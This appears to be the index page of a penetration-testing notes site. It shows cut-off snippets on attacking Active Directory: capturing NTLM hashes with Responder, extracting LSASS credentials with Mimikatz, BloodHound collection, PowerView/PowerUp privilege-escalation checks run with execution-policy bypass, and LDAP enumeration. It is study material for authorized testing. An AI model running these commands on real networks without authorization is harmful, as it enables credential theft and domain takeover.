  • Responder

    responder: Listen with responder on a network and wait for AD systems to ask for a DC. This can reveal an NTLM hash. Start responder on your own system: sudo responder -I tun0 --wpad Connect from the target system to this system via SMB, in the Windows Explorer or on the command line via dir…

  • Mimikatz

    Windows creates and stores credentials in memory in the Local Security Authority Subsystem Service (LSASS). On the filesystem, the SAM database stores the hashes. Use Mimikatz. Usage: Enable debug mode. This uses the SeDebugPrivilege so that we are able to communicate with other processes: privilege::debug Try to elevate privileges to obtain SYSTEM user privileges:…

  • BloodHound

    BloodHound analyzes and presents Active Directory data. SharpHound is the data collector which runs on a compromised AD system. On the target: On your own system:

  • Without shell access With shell access Choose one method to enumerate. 1. User and group enumeration with net (!) See what roles/privileges THIS USER has, also locally. Maybe he/she already has administrative privileges: whoami /all List (and store!) the users of the domain: net user /domain List (and store!) information like full names, group memberships, etc.…

  • PowerSploit / PowerView

    Collection of privesc scripts. To start, upload PowerView.ps1 and: powershell -exec bypass PS> Import-Module .\PowerView.ps1 See the GitHub site for all commands. General enumeration: powershell -exec bypass PS> . .\PowerUp.ps1 PS> Invoke-AllChecks Or: powershell.exe -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks" About users: Enumerate all users: Get-NetUser Enumerate all users which do not require Kerberos preauth: Get-NetUser -PreauthNotRequired Returns…

  • Active Directory notes

    Checklist A domain of a DC consists of the following elements: An object in AD may have a set of ACEs (Access Control Entries), which is called an ACL (Access Control List). An object's ACEs can be retrieved in PS with Get-ObjectAcl [-Identity] $object. The SCM (Service Control Manager) contains a database of installed services…

  • Ports: ldap 389/tcp, ldaps 636/tcp, globalldap/globalcatldap 3268/tcp, globalldaps/globalcatldapssl 3269/tcp. Enumerate without credentials. Nmap enumeration scans: nmap -n -sV --script "ldap* and not brute" $target Ldapsearch scan: ldapsearch -x -h $target -D '' -w '' -b "DC=BLA,DC=local" Connect to LDAPS/GlobalLDAPS: openssl s_client -connect $target:636 </dev/null openssl s_client -connect $target:3269 </dev/null Search in the directory: ldapsearch -x -b…